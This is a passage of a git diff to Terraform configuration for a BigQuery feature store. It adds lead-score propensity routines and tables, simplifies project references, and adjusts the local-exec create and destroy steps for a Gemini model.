null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_rolling_window_metrics" routine_type = "PROCEDURE" @@ -1003,13 +1128,27 @@ resource "google_bigquery_routine" "invoke_backfill_user_rolling_window_metrics" description = "Procedure that backfills the user_rolling_window_metrics feature table. Run this procedure occasionally before training the models." } +data "local_file" "invoke_backfill_user_rolling_window_lead_metrics_file" { + filename = "${local.sql_dir}/query/invoke_backfill_user_rolling_window_lead_metrics.sql" +} + +resource "google_bigquery_routine" "invoke_backfill_user_rolling_window_lead_metrics" { + project = local.feature_store_project_id + dataset_id = google_bigquery_dataset.feature_store.dataset_id + routine_id = "invoke_backfill_user_rolling_window_lead_metrics" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.invoke_backfill_user_rolling_window_lead_metrics_file.content + description = "Procedure that backfills the user_rolling_window_lead_metrics feature table. Run this procedure occasionally before training the models." +} + data "local_file" "invoke_backfill_user_scoped_lifetime_metrics_file" { filename = "${local.sql_dir}/query/invoke_backfill_user_scoped_lifetime_metrics.sql" } resource "google_bigquery_routine" "invoke_backfill_user_scoped_lifetime_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_scoped_lifetime_metrics" routine_type = "PROCEDURE" @@ -1023,7 +1162,7 @@ data "local_file" "invoke_backfill_user_scoped_metrics_file" { } resource "google_bigquery_routine" "invoke_backfill_user_scoped_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_scoped_metrics" routine_type = "PROCEDURE" @@ -1037,7 +1176,7 @@ data "local_file" "invoke_backfill_user_scoped_segmentation_metrics_file" { } resource "google_bigquery_routine" "invoke_backfill_user_scoped_segmentation_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_scoped_segmentation_metrics" routine_type = "PROCEDURE" @@ -1051,7 +1190,7 @@ data "local_file" "invoke_backfill_user_segmentation_dimensions_file" { } resource "google_bigquery_routine" "invoke_backfill_user_segmentation_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_segmentation_dimensions" routine_type = "PROCEDURE" @@ -1065,7 +1204,7 @@ data "local_file" "invoke_backfill_user_session_event_aggregated_metrics_file" { } resource "google_bigquery_routine" "invoke_backfill_user_session_event_aggregated_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_backfill_user_session_event_aggregated_metrics" routine_type = "PROCEDURE" @@ -1074,25 +1213,6 @@ resource "google_bigquery_routine" "invoke_backfill_user_session_event_aggregate description = "Procedure that backfills the user_session_event_aggregated_metrics feature table. Run this procedure occasionally before training the models." } -data "local_file" "invoke_backfill_user_behaviour_revenue_insights_file" { - filename = "${local.sql_dir}/query/invoke_backfill_user_behaviour_revenue_insights.sql" -} - -resource "google_bigquery_routine" "invoke_backfill_user_behaviour_revenue_insights" { - project = null_resource.check_gemini_model_exists.id != "" ? local.gemini_insights_project_id : local.feature_store_project_id - dataset_id = local.config_bigquery.dataset.gemini_insights.name - routine_id = "invoke_backfill_user_behaviour_revenue_insights" - routine_type = "PROCEDURE" - language = "SQL" - definition_body = data.local_file.invoke_backfill_user_behaviour_revenue_insights_file.content - description = "Procedure that backfills the user_behaviour_revenue_insights table with gemini insights. Daily granularity level. Run this procedure occasionally before consuming gemini insights on the Looker Dahboard." - - depends_on = [ - null_resource.check_gemini_model_exists, - null_resource.create_gemini_model - ] -} - /* *Including the Inference, Training and Explanation routines */ @@ -1103,7 +1223,7 @@ data "local_file" "invoke_customer_lifetime_value_inference_preparation_file" { } resource "google_bigquery_routine" "invoke_customer_lifetime_value_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.customer_lifetime_value_project_id : local.feature_store_project_id + project = local.customer_lifetime_value_project_id dataset_id = google_bigquery_dataset.customer_lifetime_value.dataset_id routine_id = "invoke_customer_lifetime_value_inference_preparation" routine_type = "PROCEDURE" @@ -1117,7 +1237,7 @@ data "local_file" "invoke_purchase_propensity_inference_preparation_file" { } resource "google_bigquery_routine" "invoke_purchase_propensity_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.purchase_propensity_project_id : local.feature_store_project_id + project = local.purchase_propensity_project_id dataset_id = google_bigquery_dataset.purchase_propensity.dataset_id routine_id = "invoke_purchase_propensity_inference_preparation" routine_type = "PROCEDURE" @@ -1131,7 +1251,7 @@ data "local_file" "invoke_churn_propensity_inference_preparation_file" { } resource "google_bigquery_routine" "invoke_churn_propensity_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.churn_propensity_project_id : local.feature_store_project_id + project = local.churn_propensity_project_id dataset_id = google_bigquery_dataset.churn_propensity.dataset_id routine_id = "invoke_churn_propensity_inference_preparation" routine_type = "PROCEDURE" @@ -1139,13 +1259,26 @@ resource "google_bigquery_routine" "invoke_churn_propensity_inference_preparatio definition_body = data.local_file.invoke_churn_propensity_inference_preparation_file.content } +data "local_file" "invoke_lead_score_propensity_inference_preparation_file" { + filename = "${local.sql_dir}/query/invoke_lead_score_propensity_inference_preparation.sql" +} + +resource "google_bigquery_routine" "invoke_lead_score_propensity_inference_preparation" { + project = local.lead_score_propensity_project_id + dataset_id = google_bigquery_dataset.lead_score_propensity.dataset_id + routine_id = "invoke_lead_score_propensity_inference_preparation" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.invoke_lead_score_propensity_inference_preparation_file.content +} + data "local_file" "invoke_audience_segmentation_inference_preparation_file" { filename = "${local.sql_dir}/query/invoke_audience_segmentation_inference_preparation.sql" } resource "google_bigquery_routine" "invoke_audience_segmentation_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.audience_segmentation_project_id : local.feature_store_project_id + project = local.audience_segmentation_project_id dataset_id = google_bigquery_dataset.audience_segmentation.dataset_id routine_id = "invoke_audience_segmentation_inference_preparation" routine_type = "PROCEDURE" @@ -1158,7 +1291,7 @@ data "local_file" "invoke_auto_audience_segmentation_inference_preparation_file" } resource "google_bigquery_routine" "invoke_auto_audience_segmentation_inference_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.auto_audience_segmentation_project_id : local.feature_store_project_id + project = local.auto_audience_segmentation_project_id dataset_id = google_bigquery_dataset.auto_audience_segmentation.dataset_id routine_id = "invoke_auto_audience_segmentation_inference_preparation" routine_type = "PROCEDURE" @@ -1171,7 +1304,7 @@ data "local_file" "invoke_auto_audience_segmentation_training_preparation_file" } resource "google_bigquery_routine" "invoke_auto_audience_segmentation_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.auto_audience_segmentation_project_id : local.feature_store_project_id + project = local.auto_audience_segmentation_project_id dataset_id = google_bigquery_dataset.auto_audience_segmentation.dataset_id routine_id = "invoke_auto_audience_segmentation_training_preparation" routine_type = "PROCEDURE" @@ -1185,7 +1318,7 @@ data "local_file" "invoke_customer_lifetime_value_training_preparation_file" { } resource "google_bigquery_routine" "invoke_customer_lifetime_value_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.customer_lifetime_value_project_id : local.feature_store_project_id + project = local.customer_lifetime_value_project_id dataset_id = google_bigquery_dataset.customer_lifetime_value.dataset_id routine_id = "invoke_customer_lifetime_value_training_preparation" routine_type = "PROCEDURE" @@ -1199,7 +1332,7 @@ data "local_file" "invoke_purchase_propensity_training_preparation_file" { } resource "google_bigquery_routine" "invoke_purchase_propensity_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.purchase_propensity_project_id : local.feature_store_project_id + project = local.purchase_propensity_project_id dataset_id = google_bigquery_dataset.purchase_propensity.dataset_id routine_id = "invoke_purchase_propensity_training_preparation" routine_type = "PROCEDURE" @@ -1213,7 +1346,7 @@ data "local_file" "invoke_churn_propensity_training_preparation_file" { } resource "google_bigquery_routine" "invoke_churn_propensity_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.churn_propensity_project_id : local.feature_store_project_id + project = local.churn_propensity_project_id dataset_id = google_bigquery_dataset.churn_propensity.dataset_id routine_id = "invoke_churn_propensity_training_preparation" routine_type = "PROCEDURE" @@ -1222,12 +1355,25 @@ resource "google_bigquery_routine" "invoke_churn_propensity_training_preparation } +data "local_file" "invoke_lead_score_propensity_training_preparation_file" { + filename = "${local.sql_dir}/query/invoke_lead_score_propensity_training_preparation.sql" +} + +resource "google_bigquery_routine" "invoke_lead_score_propensity_training_preparation" { + project = local.lead_score_propensity_project_id + dataset_id = google_bigquery_dataset.lead_score_propensity.dataset_id + routine_id = "invoke_lead_score_propensity_training_preparation" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.invoke_lead_score_propensity_training_preparation_file.content +} + data "local_file" "invoke_audience_segmentation_training_preparation_file" { filename = "${local.sql_dir}/query/invoke_audience_segmentation_training_preparation.sql" } resource "google_bigquery_routine" "invoke_audience_segmentation_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.audience_segmentation_project_id : local.feature_store_project_id + project = local.audience_segmentation_project_id dataset_id = google_bigquery_dataset.audience_segmentation.dataset_id routine_id = "invoke_audience_segmentation_training_preparation" routine_type = "PROCEDURE" @@ -1242,11 +1388,11 @@ data "local_file" "invoke_aggregated_value_based_bidding_training_preparation_fi # Terraform resource for invoking the bigquery stored procedure resource "google_bigquery_routine" "invoke_aggregated_value_based_bidding_training_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.aggregated_vbb_project_id : local.feature_store_project_id - dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id - routine_id = "invoke_aggregated_value_based_bidding_training_preparation" - routine_type = "PROCEDURE" - language = "SQL" + project = local.aggregated_vbb_project_id + dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id + routine_id = "invoke_aggregated_value_based_bidding_training_preparation" + routine_type = "PROCEDURE" + language = "SQL" definition_body = data.local_file.invoke_aggregated_value_based_bidding_training_preparation_file.content } @@ -1257,11 +1403,11 @@ data "local_file" "invoke_aggregated_value_based_bidding_explanation_preparation # Terraform resource for invoking the bigquery stored procedure resource "google_bigquery_routine" "invoke_aggregated_value_based_bidding_explanation_preparation" { - project = null_resource.check_bigquery_api.id != "" ? local.aggregated_vbb_project_id : local.feature_store_project_id - dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id - routine_id = "invoke_aggregated_value_based_bidding_explanation_preparation" - routine_type = "PROCEDURE" - language = "SQL" + project = local.aggregated_vbb_project_id + dataset_id = module.aggregated_vbb.bigquery_dataset.dataset_id + routine_id = "invoke_aggregated_value_based_bidding_explanation_preparation" + routine_type = "PROCEDURE" + language = "SQL" definition_body = data.local_file.invoke_aggregated_value_based_bidding_explanation_preparation_file.content } @@ -1274,7 +1420,7 @@ data "local_file" "invoke_customer_lifetime_value_label_file" { } resource "google_bigquery_routine" "invoke_customer_lifetime_value_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_customer_lifetime_value_label" routine_type = "PROCEDURE" @@ -1288,7 +1434,7 @@ data "local_file" "invoke_purchase_propensity_label_file" { } resource "google_bigquery_routine" "invoke_purchase_propensity_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_purchase_propensity_label" routine_type = "PROCEDURE" @@ -1298,12 +1444,26 @@ resource "google_bigquery_routine" "invoke_purchase_propensity_label" { } +data "local_file" "invoke_lead_score_propensity_label_file" { + filename = "${local.sql_dir}/query/invoke_lead_score_propensity_label.sql" +} + +resource "google_bigquery_routine" "invoke_lead_score_propensity_label" { + project = local.feature_store_project_id + dataset_id = google_bigquery_dataset.feature_store.dataset_id + routine_id = "invoke_lead_score_propensity_label" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.invoke_lead_score_propensity_label_file.content + description = "Procedure that invokes the lead_score_propensity_label table. Daily granularity level. Run this procedure daily before running prediction pipelines." +} + data "local_file" "invoke_churn_propensity_label_file" { filename = "${local.sql_dir}/query/invoke_churn_propensity_label.sql" } resource "google_bigquery_routine" "invoke_churn_propensity_label" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_churn_propensity_label" routine_type = "PROCEDURE" @@ -1318,7 +1478,7 @@ data "local_file" "invoke_user_dimensions_file" { } resource "google_bigquery_routine" "invoke_user_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_dimensions" routine_type = "PROCEDURE" @@ -1332,7 +1492,7 @@ data "local_file" "invoke_user_lifetime_dimensions_file" { } resource "google_bigquery_routine" "invoke_user_lifetime_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_lifetime_dimensions" routine_type = "PROCEDURE" @@ -1347,7 +1507,7 @@ data "local_file" "invoke_user_lookback_metrics_file" { } resource "google_bigquery_routine" "invoke_user_lookback_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_lookback_metrics" routine_type = "PROCEDURE" @@ -1362,7 +1522,7 @@ data "local_file" "invoke_user_rolling_window_lifetime_metrics_file" { } resource "google_bigquery_routine" "invoke_user_rolling_window_lifetime_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_rolling_window_lifetime_metrics" routine_type = "PROCEDURE" @@ -1377,7 +1537,7 @@ data "local_file" "invoke_user_rolling_window_metrics_file" { } resource "google_bigquery_routine" "invoke_user_rolling_window_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_rolling_window_metrics" routine_type = "PROCEDURE" @@ -1387,12 +1547,26 @@ resource "google_bigquery_routine" "invoke_user_rolling_window_metrics" { } +data "local_file" "invoke_user_rolling_window_lead_metrics_file" { + filename = "${local.sql_dir}/query/invoke_user_rolling_window_lead_metrics.sql" +} + +resource "google_bigquery_routine" "invoke_user_rolling_window_lead_metrics" { + project = local.feature_store_project_id + dataset_id = google_bigquery_dataset.feature_store.dataset_id + routine_id = "invoke_user_rolling_window_lead_metrics" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.invoke_user_rolling_window_lead_metrics_file.content + description = "Procedure that invokes the user_rolling_window_lead_metrics table. Daily granularity level. Run this procedure daily before running prediction pipelines." +} + data "local_file" "invoke_user_scoped_lifetime_metrics_file" { filename = "${local.sql_dir}/query/invoke_user_scoped_lifetime_metrics.sql" } resource "google_bigquery_routine" "invoke_user_scoped_lifetime_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_scoped_lifetime_metrics" routine_type = "PROCEDURE" @@ -1406,7 +1580,7 @@ data "local_file" "invoke_user_scoped_metrics_file" { } resource "google_bigquery_routine" "invoke_user_scoped_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_scoped_metrics" routine_type = "PROCEDURE" @@ -1420,7 +1594,7 @@ data "local_file" "invoke_user_scoped_segmentation_metrics_file" { } resource "google_bigquery_routine" "invoke_user_scoped_segmentation_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_scoped_segmentation_metrics" routine_type = "PROCEDURE" @@ -1434,7 +1608,7 @@ data "local_file" "invoke_user_segmentation_dimensions_file" { } resource "google_bigquery_routine" "invoke_user_segmentation_dimensions" { - project = null_resource.check_bigquery_api.id != "" ? local.feature_store_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_segmentation_dimensions" routine_type = "PROCEDURE" @@ -1448,7 +1622,7 @@ data "local_file" "invoke_user_session_event_aggregated_metrics_file" { } resource "google_bigquery_routine" "invoke_user_session_event_aggregated_metrics" { - project = null_resource.check_bigquery_api.id != "" ? local.purchase_propensity_project_id : local.feature_store_project_id + project = local.feature_store_project_id dataset_id = google_bigquery_dataset.feature_store.dataset_id routine_id = "invoke_user_session_event_aggregated_metrics" routine_type = "PROCEDURE" @@ -1464,29 +1638,47 @@ data "local_file" "create_gemini_model_file" { # This resource executes gcloud commands to run a query that creates a gemini model connected to Vertex AI LLM API. resource "null_resource" "create_gemini_model" { triggers = { - vertex_ai_connection_exists = google_bigquery_connection.vertex_ai_connection.id, - gemini_dataset_exists = module.gemini_insights.bigquery_dataset.id, + #gemini_dataset_exists = module.gemini_insights.bigquery_dataset.id, check_gemini_dataset_listed = null_resource.check_gemini_insights_dataset_exists.id + + create_command = <<-EOT + ${var.uv_run_alias} bq query --use_legacy_sql=false --max_rows=100 --maximum_bytes_billed=10000000 < ${data.local_file.create_gemini_model_file.filename} + EOT + + # The destroy command deletes the model. + destroy_command = <<-EOT + ${var.uv_run_alias} bq rm -f --model ${local.gemini_insights_project_id}:${local.config_bigquery.dataset.gemini_insights.name}.gemini_1_5_pro + EOT } provisioner "local-exec" { - command = <<-EOT - ${local.poetry_run_alias} bq query --use_legacy_sql=false --max_rows=100 --maximum_bytes_billed=10000000 < ${data.local_file.create_gemini_model_file.filename} - EOT + when = create + command = self.triggers.create_command + } + + provisioner "local-exec" { + when = destroy + command = self.triggers.destroy_command + } + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true } depends_on = [ - google_bigquery_connection.vertex_ai_connection, - module.gemini_insights.google_bigquery_dataset, - null_resource.check_gemini_insights_dataset_exists + #module.gemini_insights.google_bigquery_dataset, + null_resource.check_gemini_insights_dataset_exists, ] } # Since enabling APIs can take a few seconds, we need to make the deployment wait until the model is created in BigQuery. resource "null_resource" "check_gemini_model_exists" { triggers = { - vertex_ai_connection_exists = google_bigquery_connection.vertex_ai_connection.id - gemini_model_created = null_resource.create_gemini_model.id + gemini_model_created = null_resource.create_gemini_model.id } provisioner "local-exec" { @@ -1498,17 +1690,15 @@ resource "null_resource" "check_gemini_model_exists" { sleep 5 printf "." COUNTER=$((COUNTER + 1)) + if [ $COUNTER -eq $MAX_TRIES ]; then + echo "Gemini model was not created, terraform can not continue!" + exit 1 + fi done - if [ $COUNTER -eq $MAX_TRIES ]; then - echo "Gemini model was not created, terraform can not continue!" - exit 1 - fi - sleep 5 EOT } depends_on = [ - google_bigquery_connection.vertex_ai_connection, null_resource.create_gemini_model ] } @@ -1518,7 +1708,7 @@ data "local_file" "invoke_user_behaviour_revenue_insights_file" { } resource "google_bigquery_routine" "invoke_user_behaviour_revenue_insights" { - project = null_resource.check_gemini_model_exists.id != "" ? local.gemini_insights_project_id : local.feature_store_project_id + project = local.gemini_insights_project_id dataset_id = local.config_bigquery.dataset.gemini_insights.name routine_id = "invoke_user_behaviour_revenue_insights" routine_type = "PROCEDURE" @@ -1527,7 +1717,71 @@ resource "google_bigquery_routine" "invoke_user_behaviour_revenue_insights" { description = "Procedure that invokes the user_behaviour_revenue_insights table with gemini insights. Daily granularity level. Run this procedure daily before consuming gemini insights on the Looker Dahboard." depends_on = [ + module.gemini_insights.google_bigquery_dataset, + #null_resource.check_gemini_model_exists, + ] +} + +# This resource reads the contents of a local SQL file named user_behaviour_revenue_insights.sql and +# stores it in a variable named user_behaviour_revenue_insights_file.content. +# The SQL file is expected to contain the definition of a BigQuery procedure named user_behaviour_revenue_insights. +data "local_file" "user_behaviour_revenue_insights_file" { + filename = "${local.sql_dir}/procedure/user_behaviour_revenue_insights.sql" +} + +# The user_behaviour_revenue_insights procedure is designed to generate gemini insights. +resource "google_bigquery_routine" "user_behaviour_revenue_insights" { + project = local.gemini_insights_project_id + dataset_id = local.config_bigquery.dataset.gemini_insights.name + routine_id = "user_behaviour_revenue_insights" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.user_behaviour_revenue_insights_file.content + description = "Procedure that generates gemini insights for . Daily granularity level. Run this procedure every day before consuming gemini insights on the Looker Dahboard." + arguments { + name = "input_date" + mode = "INOUT" + data_type = jsonencode({ "typeKind" : "DATE" }) + } + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } + + depends_on = [ + #module.gemini_insights.google_bigquery_dataset, + null_resource.check_gemini_model_exists, + ] +} + + +data "local_file" "invoke_backfill_user_behaviour_revenue_insights_file" { + filename = "${local.sql_dir}/query/invoke_backfill_user_behaviour_revenue_insights.sql" +} + +resource "google_bigquery_routine" "invoke_backfill_user_behaviour_revenue_insights" { + project = local.gemini_insights_project_id + dataset_id = local.config_bigquery.dataset.gemini_insights.name + routine_id = "invoke_backfill_user_behaviour_revenue_insights" + routine_type = "PROCEDURE" + language = "SQL" + definition_body = data.local_file.invoke_backfill_user_behaviour_revenue_insights_file.content + description = "Procedure that backfills the user_behaviour_revenue_insights table with gemini insights. Daily granularity level. Run this procedure occasionally before consuming gemini insights on the Looker Dahboard." + + # The lifecycle block is used to configure the lifecycle of the table. In this case, the ignore_changes attribute is set to all, which means that Terraform will ignore + # any changes to the table and will not attempt to update the table. The prevent_destroy attribute is set to true, which means that Terraform will prevent the table from being destroyed. + lifecycle { + ignore_changes = all + #prevent_destroy = true + create_before_destroy = true + } + + depends_on = [ + #module.gemini_insights.google_bigquery_dataset, null_resource.check_gemini_model_exists, - null_resource.create_gemini_model ] } \ No newline at end of file diff --git a/infrastructure/terraform/modules/feature-store/bigquery-tables.tf b/infrastructure/terraform/modules/feature-store/bigquery-tables.tf index c968bda2..024c620d 100644 --- a/infrastructure/terraform/modules/feature-store/bigquery-tables.tf +++ b/infrastructure/terraform/modules/feature-store/bigquery-tables.tf @@ -15,10 +15,10 @@ # This resource creates a BigQuery table named audience_segmentation_inference_preparation # in the dataset specified by google_bigquery_dataset.audience_segmentation.dataset_id. resource "google_bigquery_table" "audience_segmentation_inference_preparation" { - project = google_bigquery_dataset.audience_segmentation.project - dataset_id = google_bigquery_dataset.audience_segmentation.dataset_id - table_id = local.config_bigquery.table.audience_segmentation_inference_preparation.table_name - description = local.config_bigquery.table.audience_segmentation_inference_preparation.table_description + project = google_bigquery_dataset.audience_segmentation.project + dataset_id = google_bigquery_dataset.audience_segmentation.dataset_id + table_id = local.config_bigquery.table.audience_segmentation_inference_preparation.table_name + description = local.config_bigquery.table.audience_segmentation_inference_preparation.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -34,10 +34,10 @@ resource "google_bigquery_table" "audience_segmentation_inference_preparation" { # This resource creates a BigQuery table named customer_lifetime_value_inference_preparation # in the dataset specified by google_bigquery_dataset.customer_lifetime_value.dataset_id. resource "google_bigquery_table" "customer_lifetime_value_inference_preparation" { - project = google_bigquery_dataset.customer_lifetime_value.project - dataset_id = google_bigquery_dataset.customer_lifetime_value.dataset_id - table_id = local.config_bigquery.table.customer_lifetime_value_inference_preparation.table_name - description = local.config_bigquery.table.customer_lifetime_value_inference_preparation.table_description + project = google_bigquery_dataset.customer_lifetime_value.project + dataset_id = google_bigquery_dataset.customer_lifetime_value.dataset_id + table_id = local.config_bigquery.table.customer_lifetime_value_inference_preparation.table_name + description = local.config_bigquery.table.customer_lifetime_value_inference_preparation.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -53,10 +53,10 @@ resource "google_bigquery_table" "customer_lifetime_value_inference_preparation" # This resource creates a BigQuery table named customer_lifetime_value_label # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "customer_lifetime_value_label" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.customer_lifetime_value_label.table_name - description = local.config_bigquery.table.customer_lifetime_value_label.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.customer_lifetime_value_label.table_name + description = local.config_bigquery.table.customer_lifetime_value_label.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -79,10 +79,10 @@ resource "google_bigquery_table" "customer_lifetime_value_label" { # This resource creates a BigQuery table named purchase_propensity_inference_preparation # in the dataset specified by google_bigquery_dataset.purchase_propensity.dataset_id. resource "google_bigquery_table" "purchase_propensity_inference_preparation" { - project = google_bigquery_dataset.purchase_propensity.project - dataset_id = google_bigquery_dataset.purchase_propensity.dataset_id - table_id = local.config_bigquery.table.purchase_propensity_inference_preparation.table_name - description = local.config_bigquery.table.purchase_propensity_inference_preparation.table_description + project = google_bigquery_dataset.purchase_propensity.project + dataset_id = google_bigquery_dataset.purchase_propensity.dataset_id + table_id = local.config_bigquery.table.purchase_propensity_inference_preparation.table_name + description = local.config_bigquery.table.purchase_propensity_inference_preparation.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -97,10 +97,10 @@ resource "google_bigquery_table" "purchase_propensity_inference_preparation" { # This resource creates a BigQuery table named churn_propensity_inference_preparation # in the dataset specified by google_bigquery_dataset.churn_propensity.dataset_id. resource "google_bigquery_table" "churn_propensity_inference_preparation" { - project = google_bigquery_dataset.churn_propensity.project - dataset_id = google_bigquery_dataset.churn_propensity.dataset_id - table_id = local.config_bigquery.table.churn_propensity_inference_preparation.table_name - description = local.config_bigquery.table.churn_propensity_inference_preparation.table_description + project = google_bigquery_dataset.churn_propensity.project + dataset_id = google_bigquery_dataset.churn_propensity.dataset_id + table_id = local.config_bigquery.table.churn_propensity_inference_preparation.table_name + description = local.config_bigquery.table.churn_propensity_inference_preparation.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -112,13 +112,31 @@ resource "google_bigquery_table" "churn_propensity_inference_preparation" { schema = file("${local.sql_dir}/schema/table/churn_propensity_inference_preparation.json") } +# This resource creates a BigQuery table named lead_score_propensity_inference_preparation +# in the dataset specified by google_bigquery_dataset.lead_score_propensity.dataset_id. +resource "google_bigquery_table" "lead_score_propensity_inference_preparation" { + project = google_bigquery_dataset.lead_score_propensity.project + dataset_id = google_bigquery_dataset.lead_score_propensity.dataset_id + table_id = local.config_bigquery.table.lead_score_propensity_inference_preparation.table_name + description = local.config_bigquery.table.lead_score_propensity_inference_preparation.table_description + + # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. + deletion_protection = false + labels = { + version = "prod" + } + + # The schema attribute specifies the schema of the table. In this case, the schema is defined in the JSON file. + schema = file("${local.sql_dir}/schema/table/lead_score_propensity_inference_preparation.json") +} + # This resource creates a BigQuery table named purchase_propensity_label # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "purchase_propensity_label" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = local.config_bigquery.table.purchase_propensity_label.table_name - description = local.config_bigquery.table.purchase_propensity_label.table_description + project = google_bigquery_dataset.feature_store.project + dataset_id = google_bigquery_dataset.feature_store.dataset_id + table_id = local.config_bigquery.table.purchase_propensity_label.table_name + description = local.config_bigquery.table.purchase_propensity_label.table_description # The deletion_protection attribute specifies whether the table should be protected from deletion. In this case, it's set to false, which means that the table can be deleted. deletion_protection = false @@ -140,10 +158,10 @@ resource "google_bigquery_table" "purchase_propensity_label" { # This resource creates a BigQuery table named churn_propensity_label # in the dataset specified by google_bigquery_dataset.feature_store.dataset_id. resource "google_bigquery_table" "churn_propensity_label" { - project = google_bigquery_dataset.feature_store.project - dataset_id = google_bigquery_dataset.feature_store.dataset_id - table_id = 